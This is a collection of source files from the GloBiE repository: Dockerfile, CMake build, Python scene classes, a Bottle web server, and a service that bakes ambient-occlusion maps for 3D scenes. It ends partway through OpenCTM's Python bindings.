"is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 1936, "license_type": "permissive", "max_line_length": 255, "num_lines": 56, "path": "/Dockerfile", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "FROM ubuntu:19.04 as build\n\nMAINTAINER Stefan Lemme <[email protected]>\n\nRUN apt-get update && \\\n apt-get install -y cmake make g++ git libpng-dev python3-dev python3-pip && \\\n apt-get install -y llvm-8-dev clang-8 llvm clang libclang-8-dev libedit-dev && \\\n apt-get install -y vim git-svn cmake-curses-gui libopenctm-dev && \\\n rm -rf /var/lib/apt/lists/*\n\nWORKDIR /opt\n\nRUN git clone https://github.com/stlemme/RV.git --recursive -b standalone_80 rv_src && \\\n mkdir rv_build && \\\n cd rv_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_STANDARD=14 ../rv_src && \\\n make\n\nRUN git clone https://github.com/AnyDSL/anydsl.git -b cmake-based-setup anydsl_src && \\\n mkdir anydsl_build && \\\n cd anydsl_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DRUNTIME_JIT=ON -DBUILD_TESTING=ON -DAnyDSL_DEFAULT_BRANCH=llvm-cmake -DRV_INCLUDE_DIR=/opt/rv_src/include -DRV_LIBRARY=/opt/rv_build/src/libRV.a -DRV_SLEEF_LIBRARY=/opt/rv_build/vecmath/libgensleef.a ../anydsl_src && \\\n make\n\nRUN git clone https://github.com/pybind/pybind11 -b stable && \\\n pip3 install pytest && \\\n cd pybind11 && \\\n cmake -DCMAKE_BUILD_TYPE=Release . && \\\n make install\n\nCOPY ./requirements*.txt /opt/rendering-support-service/\n\nRUN pip3 install -r /opt/rendering-support-service/requirements.txt && \\\n pip3 install -r /opt/rendering-support-service/requirements-dev.txt\n\nCOPY . /opt/rendering-support-service\n\nRUN mkdir rss_build && \\\n cd rss_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DAnyDSL_runtime_DIR=/opt/anydsl_build/share/anydsl/cmake -DPYTHON_EXECUTABLE=/usr/bin/python3 ../rendering-support-service && \\\n make dist\n\n# compose final image\nFROM ubuntu:19.04\n\nRUN apt-get update && \\\n apt-get install -y libopenctm-dev && \\\n rm -rf /var/lib/apt/lists/*\n\nCOPY --from=build /opt/rss_build/dist/GloBiE /opt/rendering-support-service/GloBiE\n\nWORKDIR /opt/rendering-support-service\n\nCMD [\"/opt/rendering-support-service/GloBiE\"]\n\nEXPOSE 8080\n\n" }, { "alpha_fraction": 0.5302973389625549, "alphanum_fraction": 0.5385773181915283, "avg_line_length": 28.853933334350586, "blob_id": "ca8f091d2202f7977d8e2a6689c7cd0afdde577b", "content_id": "bf9c9586734e23f40f99e49fd10b9cf7aef44427", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "permissive", "max_line_length": 81, "num_lines": 89, "path": "/scene.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\n\n\nclass SceneNode(object):\n def __init__(self, name: str):\n self.name = name\n self.parent: SceneNode = None\n\n def accept(self, visitor):\n visitor.visit_SceneNode(self, 'forward')\n visitor.visit_SceneNode(self, 'backward')\n\n\nclass Group(SceneNode):\n def __init__(self, name):\n SceneNode.__init__(self, name)\n self.transform = glm.mat4(1)\n self.children = []\n\n def add(self, node):\n self.children.append(node)\n\n def accept(self, visitor):\n visitor.visit_Group(self, 'forward')\n for child in self.children:\n child.accept(visitor)\n visitor.visit_Group(self, 'backward')\n\n def __repr__(self):\n out = []\n for child in self.children:\n lines = repr(child).splitlines()\n out.append(\" - %s\" % lines[0])\n out += [\" \" * 3 + line for line in lines[1:]]\n # if self.transform != glm.mat4(1):\n # tf = str(self.transform) + '\\n'\n # else:\n tf = ''\n result = (\"Group (%s)\\n\" % (self.name)) + tf + '\\n'.join(out)\n if self.parent is not None:\n result = (\"Group (%s, parent %s)\\n\" %\n (self.name, self.parent.name)) + tf + '\\n'.join(out)\n return result\n\n\nclass Mesh(SceneNode):\n def __init__(self, name):\n SceneNode.__init__(self, name)\n self.triangles = []\n\n def add(self, prim):\n self.triangles.append(prim)\n\n def accept(self, visitor):\n # self.name = self.parent.parent.name\n visitor.visit_Mesh(self, 'forward')\n visitor.visit_Mesh(self, 'backward')\n\n def __repr__(self):\n result = \"Mesh (%s) with %d triangles\" % (self.name, len(\n self.triangles))\n if self.parent is not None:\n result = \"Mesh (%s, parent %s, grandparent %s) with %d triangles\" % (\n self.name, self.parent.name, self.parent.parent.name,\n len(self.triangles))\n return result\n\n\nclass Triangle(object):\n def __init__(self, v1, v2, v3):\n self.vertices = [v1, v2, v3]\n self.texcoords = None\n self.normals = None\n self.globalUVs = None\n\n def vertex(self, i, v, t, n, uv=None):\n self.vertices[i] = v\n\n if (self.texcoords is None):\n self.texcoords = []\n self.texcoords[i] = t if t is not None else glm.vec2(0.0)\n\n if (self.normals is None):\n self.normals = []\n self.normals[i] = n if n is not None else glm.vec3(0.0)\n\n if (self.globalUVs is None):\n self.globalUVs = []\n self.globalUVs[i] = uv if uv is not None else glm.vec2(0.0)\n" }, { "alpha_fraction": 0.7409783601760864, "alphanum_fraction": 0.7481956481933594, "avg_line_length": 30.9743595123291, "blob_id": "378bc0f387aae7c05edcb7d5550c30353076524f", "content_id": "0de091f7187e4eb97a1bd70f63876ef64cc502b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 2494, "license_type": "permissive", "max_line_length": 208, "num_lines": 78, "path": "/CMakeLists.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.8)\n\nset(CMAKE_CONFIGURATION_TYPES \"Debug;Release\")\n\nproject(ig_rendering_support)\n\n\nfind_package(AnyDSL_runtime REQUIRED)\ninclude_directories(${AnyDSL_runtime_INCLUDE_DIRS})\n\nset(CLANG_FLAGS -march=native)\nset(IMPALA_FLAGS --log-level info)\n\nset(IMPALA_SOURCES\n\tsrc/ao/backend_cpu.impala\n\tsrc/ao/utils.impala\n\tsrc/ao/mapping_cpu.impala\n src/core/common.impala\n src/core/cpu_common.impala\n src/core/sort.impala\n src/core/vector.impala\n src/traversal/intersection.impala\n src/traversal/stack.impala\n src/traversal/mapping_cpu.impala\n\tsrc/ao/aobench.impala\n)\n\nanydsl_runtime_wrap(AOBENCH_PROGRAM\n CLANG_FLAGS ${CLANG_FLAGS}\n IMPALA_FLAGS ${IMPALA_FLAGS}\n INTERFACE ${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR}/interface\n FILES ${IMPALA_SOURCES})\ninclude_directories(${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR})\n\nset(CPP_SOURCES\n\tsrc/main.cpp\n\tsrc/bbox.h\n\tsrc/bvh.h\n\tsrc/common.h\n\tsrc/float3.h\n\tsrc/float4.h\n\tsrc/int.h\n\tsrc/tri.h\n)\n\nfind_package(pybind11 2.2 REQUIRED)\npybind11_add_module(ig_rendering_support ${CPP_SOURCES} ${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR}/interface.h ${AOBENCH_PROGRAM} ${IMPALA_SOURCES})\ntarget_link_libraries(ig_rendering_support PRIVATE ${AnyDSL_runtime_LIBRARIES})\n\nsource_group(TREE ${CMAKE_CURRENT_SOURCE_DIR} FILES ${IMPALA_SOURCES} ${CPP_SOURCES})\nset(RUNTIME_FILES ${AOBENCH_PROGRAM})\nlist(FILTER RUNTIME_FILES INCLUDE REGEX \"\\.(impala|h|hpp)$\")\nsource_group(\"Runtime Files\" FILES ${RUNTIME_FILES})\n\nfind_package(PythonInterp 3.6 REQUIRED)\n\nset(PYINSTALLER_DELIMITER \":\")\nif(MSVC)\n\tset(COMMAND1 \"COMMAND\" \"set\")\n\tset(COMMAND2 \"COMMAND\")\n\tset(PYINSTALLER_DELIMITER \";\")\nendif()\nadd_custom_target(test_service\n ${COMMAND1} PYTHONPATH=$<TARGET_FILE_DIR:ig_rendering_support>\n ${COMMAND2} ${PYTHON_EXECUTABLE} ${CMAKE_CURRENT_SOURCE_DIR}/service.py --test\n DEPENDS ig_rendering_support\n)\n\nfind_program(PYINSTALLER_EXECUTABLE \"pyinstaller\")\n\nset(PYINSTALLER_DEPLOYFORMAT \"-F\" CACHE STRING \"Choose whether PyInstaller shall create a single file (-F) or a directory (-D)\")\nset_property(CACHE PYINSTALLER_DEPLOYFORMAT PROPERTY STRINGS \"-F\" \"-D\")\n\nadd_custom_target(dist\n ${COMMAND1} PYTHONPATH=$<TARGET_FILE_DIR:ig_rendering_support>\n ${COMMAND2} ${PYINSTALLER_EXECUTABLE} -n \"GloBiE\" ${PYINSTALLER_DEPLOYFORMAT} --add-binary \"${CMAKE_CURRENT_SOURCE_DIR}/openctm/openctm.dll${PYINSTALLER_DELIMITER}./\" ${CMAKE_CURRENT_SOURCE_DIR}/server.py\n DEPENDS ig_rendering_support\n)\n" }, { "alpha_fraction": 0.633370578289032, "alphanum_fraction": 0.6358553767204285, "avg_line_length": 29.03358268737793, "blob_id": "c1d89007d020783f22c2fb3464f7d5e6c392ab20", "content_id": "a139426d2323fce2e4d894b41808eff74b985a45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8049, "license_type": "permissive", "max_line_length": 108, "num_lines": 268, "path": "/server.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport os\nfrom pprint import pprint\n\nfrom pathlib import Path\nfrom bottle import Bottle, run, PasteServer, response, request, static_file\nfrom service import default_out, aoConfig\nfrom bakerman import BakingMan, BakingJob\nfrom util import colorprint, prepareOutFilename, default_out_dir\nfrom remote import cachedir\n\napp = Bottle()\n\nbakingMan = BakingMan()\nbakingMan.start()\n\n\ndef extractPostParams(requestParam):\n jobSource = request.POST\n try:\n # check if json entry is available\n jsonSource = request.json\n if jsonSource is not None:\n jobSource = jsonSource\n except Exception as e:\n print(\"bakeDirect: json couldn't be parsed\")\n print(e)\n # print(jobSource)\n return jobSource\n\n\ndef staticFileWithCors(filename, root, **params):\n httpResponse = static_file(filename, root, **params)\n\n httpResponse.headers['Access-Control-Allow-Origin'] = '*'\n httpResponse.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n httpResponse.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n return httpResponse\n\n\ndef PARAMETER():\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n\ndef routeWithOptions(**kwargs):\n def decorator(callback):\n kwargs['callback'] = callback\n app.route(**kwargs)\n\n kwargs['method'] = 'OPTIONS'\n kwargs['callback'] = PARAMETER\n\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n app.route(**kwargs)\n return callback\n\n return decorator\n\n\[email protected]('after_request')\ndef enable_cors():\n \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n\n@routeWithOptions(path='/bakeFile/<fileParam:path>', method=\"GET\")\ndef bakeFile(fileParam: str):\n global bakingMan\n\n jobParams = {\"file\": fileParam, \"resolution\": aoConfig[\"resolution\"]}\n # print(jobParams)\n jobId = bakingMan.addJob(jobParams)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path='/getFile/<filename:path>', method=\"GET\")\ndef getFile(filename):\n colorprint(\"getFile \" + filename, 33)\n return staticFileWithCors(filename, './out/', download=filename)\n\n\n@routeWithOptions(path='/removeResults/', method=\"GET\")\ndef removeResults():\n print(\"remove result files\")\n folder = default_out_dir\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path) and str(the_file).startswith(\"AO_\"):\n print(\" remove\", the_file)\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n print(\"remove cache files\")\n folder = cachedir\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n print(\" remove\", the_file)\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\n@routeWithOptions(path=\"/bakeUrl/\", method=\"POST\")\ndef bakeUrl():\n global bakingMan\n # print(request)\n # print(request.POST)\n # print(request.POST.__dict__)\n # print(request.headers.__dict__)\n # print(request.method)\n\n jobSource = extractPostParams(request)\n\n urlParam = jobSource[\"url\"]\n # print(urlParam)\n\n resolutionParam = jobSource[\"resolution\"]\n resolutionValue = aoConfig[\"resolution\"]\n if resolutionParam is not None:\n resolutionValue = int(resolutionParam)\n\n args = {\"url\": urlParam, \"resolution\": resolutionValue}\n # print(args)\n\n jobId = bakingMan.addJob(args)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path=\"/bakeDirect/\", method=\"POST\")\ndef bakeDirect():\n global bakingMan\n # print(request)\n # print(request.POST)\n # print(request.POST.__dict__)\n # print(request.headers.__dict__)\n # print(request.method)\n\n jobSource = extractPostParams(request)\n\n igxcString = jobSource[\"igxcContent\"]\n # print(igxcString)\n if not igxcString or igxcString == \"null\":\n colorprint(\"No igxcContent found in POST request in bakeDirect/\", 31)\n return {\"error\": \"No igxcContent found in POST request in bakeDirect/\"}\n\n try:\n if isinstance(igxcString, str):\n igxcContent = json.loads(igxcString)\n else:\n igxcContent = igxcString\n except Exception as e:\n colorprint(\"Exception in bakeDirect/\", 31)\n print(e)\n return {\"error\": \"igxcContent couldn't be parsed\"}\n # print(igxcContent)\n\n basePath = jobSource[\"basePath\"]\n # print(basepath)\n\n resolutionValue = aoConfig[\"resolution\"]\n resolutionParam = jobSource[\"resolution\"]\n if resolutionParam is not None:\n resolutionValue = int(resolutionParam)\n\n args = {\n \"basePath\": basePath,\n \"igxcContent\": igxcContent,\n \"resolution\": resolutionValue\n }\n # print(args)\n\n jobId = bakingMan.addJob(args)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path='/pullState/<jobId>', method=\"GET\")\ndef pullState(jobId: str):\n global bakingMan\n colorprint(\"pullState id {}\".format(jobId), 33)\n\n result = {\"state\": \"undefined\"}\n if bakingMan.hasJob(jobId):\n result = bakingMan.getJob(jobId)\n\n # print(result)\n jsonResult = json.dumps(result,\n sort_keys=True,\n indent=4,\n separators=(',', ': '))\n response.content_type = \"application/json\"\n return jsonResult\n\n\n@routeWithOptions(path='/pullAll/', method=\"GET\")\ndef pullAll():\n global bakingMan\n colorprint(\"pullAll\", 33)\n result = bakingMan.getAllJobs()\n # print(result)\n jsonResult = json.dumps(result,\n sort_keys=True,\n indent=4,\n separators=(',', ': '))\n response.content_type = \"application/json\"\n return jsonResult\n\n\n@routeWithOptions(path='/getImage/<jobId>', method=\"GET\")\ndef getImage(jobId: str):\n global bakingMan\n absPath = os.path.join(os.path.abspath(\".\"), default_out_dir)\n print(absPath)\n if bakingMan.isJobFinished(jobId):\n job = bakingMan.getJob(jobId)\n fileName = job[\"jobArgs\"][\"out\"] + \".png\"\n return staticFileWithCors(fileName, absPath)\n\n\nserverConfig = {\"port\": 8080, \"host\": \"0.0.0.0\"}\n\ntry:\n with open(\"config.json\", \"r\") as f:\n configContent = json.load(f)\n if \"port\" in configContent:\n serverConfig[\"port\"] = configContent[\"port\"]\n if \"host\" in configContent:\n serverConfig[\"host\"] = configContent[\"host\"]\n if \"resolution\" in configContent:\n aoConfig[\"resolution\"] = configContent[\"resolution\"]\n print(serverConfig)\n print(aoConfig)\nexcept FileNotFoundError:\n print(\"Config file not found, using standard port\", serverConfig[\"port\"])\n\ntry:\n app.run(host=serverConfig[\"host\"],\n port=serverConfig[\"port\"],\n debug=True,\n server=PasteServer)\nexcept KeyboardInterrupt:\n pass\nfinally:\n bakingMan.stop()\n" }, { "alpha_fraction": 0.5862900018692017, "alphanum_fraction": 0.5913035273551941, "avg_line_length": 33.80537033081055, "blob_id": "adf1102caff717c2f67ee67563e0598396d33327", "content_id": "7968a1c93657d56bb1ed97c772fa3aa4dde2fa10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10372, "license_type": "permissive", "max_line_length": 79, "num_lines": 298, "path": "/service.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport numpy\nimport math\nimport os\nimport argparse\nimport sys\nimport random\n\n# add dependencies for auto-py-to-exe\n# https://github.com/pyinstaller/pyinstaller/issues/4363#issuecomment-522350024\n# import numpy.random.common\n# import numpy.random.bounded_integers\n# import numpy.random.entropy\n\nfrom PIL import Image\nfrom remote import fetch\nfrom pathlib import Path\nfrom urlpath import URL\nfrom util import colorprint, prepareOutFilename, test_scene, joinOutputPath\nfrom remote import CachedFile\n\nimport igxc\nimport scene\nimport visitor\n\ndefault_url = 'default/igcx/test-url'\ndefault_file = 'default/igcx/test-file'\ndefault_out = \"test\"\n\naoConfig = {\"resolution\": 1024}\n\n\ndef generateMap(vertices,\n normals,\n texcoord,\n size=(aoConfig[\"resolution\"], aoConfig[\"resolution\"])):\n import ig_rendering_support\n\n w, h = size\n buff = numpy.zeros((w, h, 4), dtype=numpy.uint8)\n\n ig_rendering_support.bakeAO(buff, vertices, normals, texcoord)\n\n blurred = ig_rendering_support.alphaBlur(buff, w, h)\n\n return Image.frombuffer('RGBA', (w, h), blurred, 'raw', 'RGBA', 0, 1)\n\n\ndef start():\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('--url',\n help='url to igxc resource',\n nargs='?',\n type=str,\n const=default_url)\n group.add_argument('--file',\n help='path to igxc resource',\n nargs='?',\n type=str,\n const=default_file)\n group.add_argument('--test',\n help='use default test scene',\n action='store_true')\n parser.add_argument('--out',\n '-o',\n help='basename of the generated output',\n type=str,\n default=default_out)\n parser.add_argument('--debug',\n help='show debug viewer',\n action='store_true')\n parser.add_argument('--face-normals',\n help='use computed face normals',\n action='store_true')\n args = parser.parse_args()\n dictArgs = vars(args)\n # print(args)\n\n startWithDirectArgs(dictArgs)\n\n\ndef modifyIgxc(igxcJson, outFileName, mapping):\n igxcJson[\"ObjectAmbientOcclusionMaps\"] = {'.': outFileName}\n\n for tObject in igxcJson['Objects']:\n nodeName = tObject[\"Path\"]\n if nodeName in mapping:\n tObject[\"AOTransform\"] = mapping[nodeName]\n\n\ndef startWithDirectArgs(args: dict):\n root = None\n igxcFile = None\n igxcContent = None\n urlArgument = None\n basePath = None\n result = None\n outFileHashBase = \"\"\n outFileNameBase = \"AO_result\"\n\n resolutionValue = aoConfig[\"resolution\"]\n if \"resolution\" in args and args[\"resolution\"] is not None:\n resolutionValue = int(args[\"resolution\"])\n\n if \"url\" in args and args[\"url\"] is not None:\n print('fetch url', args[\"url\"])\n urlArgument = URL(args[\"url\"])\n igxcFile = fetch(urlArgument, '.igcx')\n colorprint(\"source: \" + str(urlArgument) + '.igcx', 36)\n elif \"file\" in args and args[\"file\"] is not None:\n igxcFile = Path(args[\"file\"])\n colorprint(\"source: \" + args[\"file\"], 36)\n elif \"igxcContent\" in args and args[\"igxcContent\"] is not None:\n igxcContent = args[\"igxcContent\"]\n colorprint(\"source: bakeDirect POST parameters\", 36)\n\n elif \"test\" in args and args[\"test\"]:\n outFileNameBase = prepareOutFilename(str(random.randint(1, 1e9)),\n resolutionValue)\n root = test_scene()\n colorprint(\"source: test scene\", 36)\n\n if igxcFile is not None:\n basePath = igxcFile.parent\n\n if \"basePath\" in args and args[\"basePath\"] is not None:\n # print(args[\"basePath\"])\n basePath = CachedFile(args[\"basePath\"])\n print(\"basePath:\", basePath)\n\n debug = \"debug\" in args and args[\"debug\"]\n\n if igxcFile is not None:\n\n with igxcFile.open('r') as resource:\n igxcContent = json.load(resource)\n\n # if igxcContent is None:\n # return None\n\n if igxcContent is None:\n print(\"No content in igxc\")\n\n # check if configuration is already done\n if \"Objects\" in igxcContent and igxcContent[\"Objects\"] is not None:\n outFileHashBase = outFileHashBase + json.dumps(igxcContent[\"Objects\"],\n sort_keys=True)\n if \"Hashes\" in igxcContent and igxcContent[\"Hashes\"] is not None:\n outFileHashBase = outFileHashBase + json.dumps(igxcContent[\"Hashes\"],\n sort_keys=True)\n if outFileHashBase == \"\" and urlArgument is not None:\n outFileHashBase = urlArgument\n\n outFileNameBase = prepareOutFilename(outFileHashBase, resolutionValue)\n\n hasImage = os.path.isfile(joinOutputPath(outFileNameBase, 'png'))\n hasMapping = os.path.isfile(joinOutputPath(outFileNameBase, 'json'))\n if hasImage and hasMapping and not debug:\n colorprint(\"Taking from cache ({})\".format(outFileNameBase), 32)\n mappingResult = None\n with open(joinOutputPath(outFileNameBase, 'json'),\n 'r') as mappingInFile:\n mappingResult = json.load(mappingInFile)\n modifyIgxc(igxcContent, outFileNameBase + '.png', mappingResult)\n result = {\n \"urlAoMapImage\": outFileNameBase + '.png',\n \"urlAoMappingJson\": outFileNameBase + '.json',\n \"urlIgxcModified\": outFileNameBase + '.igxc',\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc',\n \"transforms\": mappingResult,\n \"igxcModified\": igxcContent\n }\n return result\n\n # save unmodified version of igxc\n if igxcContent is not None:\n igxcOutfileName = joinOutputPath(outFileNameBase + \"_original\", 'igxc')\n with open(igxcOutfileName, 'w') as igxcOutfile:\n json.dump(igxcContent,\n igxcOutfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=False)\n\n # result not in cache? proceed with baking\n root = None\n try:\n root = igxc.load(igxcContent, basePath)\n except AttributeError as e:\n errorMsg = \"attributes missing in igxc ({})\".format(\" \".join(e.args))\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n except ConnectionError as e:\n errorMsg = \"file referenced in igxc could not be fetched \" + \" \".join(\n e.args)\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n except Exception as e:\n errorMsg = \"igxc couldn't be loaded\"\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n print(type(e))\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n\n triCounter = visitor.TriCounter()\n root.accept(triCounter)\n print('total triangles', triCounter.count)\n\n vertices = numpy.ndarray((triCounter.count, 3, 3), dtype=numpy.float)\n normals = numpy.ndarray((triCounter.count, 3, 3), dtype=numpy.float)\n texcoord = numpy.ndarray((triCounter.count, 3, 2), dtype=numpy.float)\n\n meshCounter = visitor.MeshCounter()\n root.accept(meshCounter)\n print('total meshes', meshCounter.count)\n\n amountBucketsX = math.ceil(math.sqrt(meshCounter.count))\n amountBucketsY = math.ceil(meshCounter.count / amountBucketsX)\n print('buckets: {}x{}'.format(amountBucketsX, amountBucketsY))\n uvPacker = visitor.SimplePacker(amountBucketsX, amountBucketsY,\n resolutionValue)\n triExtractor = visitor.TransformedTriExtractor(vertices,\n normals,\n texcoord,\n packer=uvPacker)\n root.accept(triExtractor)\n\n # if face normals should be used, empty normals array\n if \"face_normals\" in args and args[\"face_normals\"] == True:\n normals = numpy.zeros((0, 3, 3), dtype=numpy.float)\n\n # print(vertices)\n # print(texcoord)\n # print(triExtractor.mapping)\n # print(\"Packer:\", uvPacker.i)\n\n img = generateMap(vertices, normals, texcoord,\n (resolutionValue, resolutionValue))\n\n # save AO map image\n output = joinOutputPath(outFileNameBase, 'png')\n print(\"Save output at\", joinOutputPath(outFileNameBase, 'png'))\n img.save(output)\n\n # save AO mapping\n mappingOutfileName = joinOutputPath(outFileNameBase, 'json')\n with open(mappingOutfileName, 'w') as outfile:\n json.dump(triExtractor.mapping,\n outfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=True)\n\n # extend existing IGXC with AO entries\n if igxcContent is not None:\n modifyIgxc(igxcContent, outFileNameBase + '.png', triExtractor.mapping)\n igxcOutfileName = joinOutputPath(outFileNameBase, 'igxc')\n with open(igxcOutfileName, 'w') as igxcOutfile:\n json.dump(igxcContent,\n igxcOutfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=False)\n\n if debug:\n import viewer\n viewer.debug_view(vertices, texcoord, image=img)\n\n result = {\n \"urlAoMapImage\": outFileNameBase + '.png',\n \"urlAoMappingJson\": outFileNameBase + '.json',\n \"urlIgxcModified\": outFileNameBase + '.igxc',\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc',\n \"transforms\": triExtractor.mapping,\n \"igxcModified\": igxcContent\n }\n return result\n\n\nif __name__ == '__main__':\n start()\n" }, { "alpha_fraction": 0.6387369632720947, "alphanum_fraction": 0.6712413430213928, "avg_line_length": 30.566774368286133, "blob_id": "8a7b85f82a4907c26dcc15362eda30f340661491", "content_id": "d5f11262ba28d80695dcb7cc4820847ba80639a0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9691, "license_type": "permissive", "max_line_length": 80, "num_lines": 307, "path": "/openctm/openctm.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "# ------------------------------------------------------------------------------\n# Product: OpenCTM\n# File: openctm.py\n# Description: Python API bindings (tested with Python 2.5.2 and Python 3.0)\n# ------------------------------------------------------------------------------\n# Copyright (c) 2009-2010 Marcus Geelnard\n#\n# This software is provided 'as-is', without any express or implied\n# warranty. In no event will the authors be held liable for any damages\n# arising from the use of this software.\n#\n# Permission is granted to anyone to use this software for any purpose,\n# including commercial applications, and to alter it and redistribute it\n# freely, subject to the following restrictions:\n#\n# 1. The origin of this software must not be misrepresented; you must not\n# claim that you wrote the original software. If you use this software\n# in a product, an acknowledgment in the product documentation would be\n# appreciated but is not required.\n#\n# 2. Altered source versions must be plainly marked as such, and must not\n# be misrepresented as being the original software.\n#\n# 3. This notice may not be removed or altered from any source\n# distribution.\n# ------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport inspect\nfrom ctypes import *\nfrom ctypes.util import find_library\n\n# Types\nCTMfloat = c_float\nCTMint = c_int32\nCTMuint = c_uint32\nCTMcontext = c_void_p\nCTMenum = c_uint32\n\n# Constants\nCTM_API_VERSION = 0x00000100\nCTM_TRUE = 1\nCTM_FALSE = 0\n\n# CTMenum\nCTM_NONE = 0x0000\nCTM_INVALID_CONTEXT = 0x0001\nCTM_INVALID_ARGUMENT = 0x0002\nCTM_INVALID_OPERATION = 0x0003\nCTM_INVALID_MESH = 0x0004\nCTM_OUT_OF_MEMORY = 0x0005\nCTM_FILE_ERROR = 0x0006\nCTM_BAD_FORMAT = 0x0007\nCTM_LZMA_ERROR = 0x0008\nCTM_INTERNAL_ERROR = 0x0009\nCTM_UNSUPPORTED_FORMAT_VERSION = 0x000A\nCTM_IMPORT = 0x0101\nCTM_EXPORT = 0x0102\nCTM_METHOD_RAW = 0x0201\nCTM_METHOD_MG1 = 0x0202\nCTM_METHOD_MG2 = 0x0203\nCTM_VERTEX_COUNT = 0x0301\nCTM_TRIANGLE_COUNT = 0x0302\nCTM_HAS_NORMALS = 0x0303\nCTM_UV_MAP_COUNT = 0x0304\nCTM_ATTRIB_MAP_COUNT = 0x0305\nCTM_VERTEX_PRECISION = 0x0306\nCTM_NORMAL_PRECISION = 0x0307\nCTM_COMPRESSION_METHOD = 0x0308\nCTM_FILE_COMMENT = 0x0309\nCTM_NAME = 0x0501\nCTM_FILE_NAME = 0x0502\nCTM_PRECISION = 0x0503\nCTM_INDICES = 0x0601\nCTM_VERTICES = 0x0602\nCTM_NORMALS = 0x0603\nCTM_UV_MAP_1 = 0x0700\nCTM_UV_MAP_2 = 0x0701\nCTM_UV_MAP_3 = 0x0702\nCTM_UV_MAP_4 = 0x0703\nCTM_UV_MAP_5 = 0x0704\nCTM_UV_MAP_6 = 0x0705\nCTM_UV_MAP_7 = 0x0706\nCTM_UV_MAP_8 = 0x0707\nCTM_ATTRIB_MAP_1 = 0x0800\nCTM_ATTRIB_MAP_2 = 0x0801\nCTM_ATTRIB_MAP_3 = 0x0802\nCTM_ATTRIB_MAP_4 = 0x0803\nCTM_ATTRIB_MAP_5 = 0x0804\nCTM_ATTRIB_MAP_6 = 0x0805\nCTM_ATTRIB_MAP_7 = 0x0806\nCTM_ATTRIB_MAP_8 = 0x0807\n\n\ndef get_script_dir(follow_symlinks=True):\n if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze\n path = os.path.abspath(sys.executable)\n else:\n path = inspect.getabsfile(get_script_dir)\n if follow_symlinks:\n path = os.path.realpath(path)\n return os.path.dirname(path)\n\n\n# Load the OpenCTM shared library\nif os.name == 'nt':\n lib = get_script_dir()\n lib = os.path.join(lib, \"openctm.dll\")\n _lib = WinDLL(lib)\nelse:\n _libName = find_library('openctm')\n if not _libName:\n raise 